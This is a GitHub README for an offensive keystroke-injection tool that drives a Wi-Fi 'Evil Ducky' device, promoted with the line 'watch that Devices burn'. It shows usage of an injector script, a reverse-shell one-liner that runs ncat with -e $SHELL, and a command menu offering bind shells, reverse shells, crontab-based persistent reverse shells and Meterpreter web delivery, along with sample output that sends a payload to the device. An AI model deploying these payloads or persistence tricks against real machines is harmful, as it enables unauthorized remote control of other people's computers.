Skip to content

Release Neo, the Evil Ducky scripts into any Hardware or drive and watch that Devices burn.

License

Notifications You must be signed in to change notification settings

byt3n33dl3/CoreNeoExec

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Warning : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the --force arguments. For more customization informations go to swisskyrepo.github.io .

Where to buy a Neo injector ? I got mine from Aliexpress

How to use the script

python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h                 
usage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
                       [--user [USER]] [--pass [PASS]] [--panel [PANEL]]
                       [--payload [PAYLOAD]]

optional arguments:
  -h, --help           show this help message and exit
  -v                   Verbosity of the output
  --host [HOST]        Host reverse-shell
  --port [PORT]        Port reverse-shell
  --user [USER]        Wifi Panel username
  --pass [PASS]        Wifi Panel password
  --panel [PANEL]      Wifi Panel password
  --payload [PAYLOAD]  Payload template

Targeting a Windows OS

python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt

Send a simple reverse-shell payload

$ python3 injector.py -v --host 127.0.0.1 --port 4444
     -------------------------------------------------------------
      Neo injector - You need to be connected to the Exploit AP
     -------------------------------------------------------------
                   __   °
                 <(o )___
                  ( ._> /
                   `---'                      @pxcs

Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
-------------------------------------------------------------------
>>> reverse
Payload:
Rem:Default Payload
Press:130+195
CustomDelay:1000
Print: bash SHELL:14
CustomDelay:1000
Press:176

Sending payload to http://192.168.1.1/runlivepayload

Payloads and commands

Commands Description
bind initiate a bind shell on results.port
reverse initiate a reverse shell on results.host and results.port
crontab set up a crontab reverse shell on results.host and results.port
meterpreter use exploit script / web delivery with a posh-payload
send some text send the specified text
h help
q quit

You can change the options with SET option_name option_value

>>> set host 127.0.0.1
>>> set port 4444

Thanks to:

  • swisskyrepo
  • metasploit
  • pxcs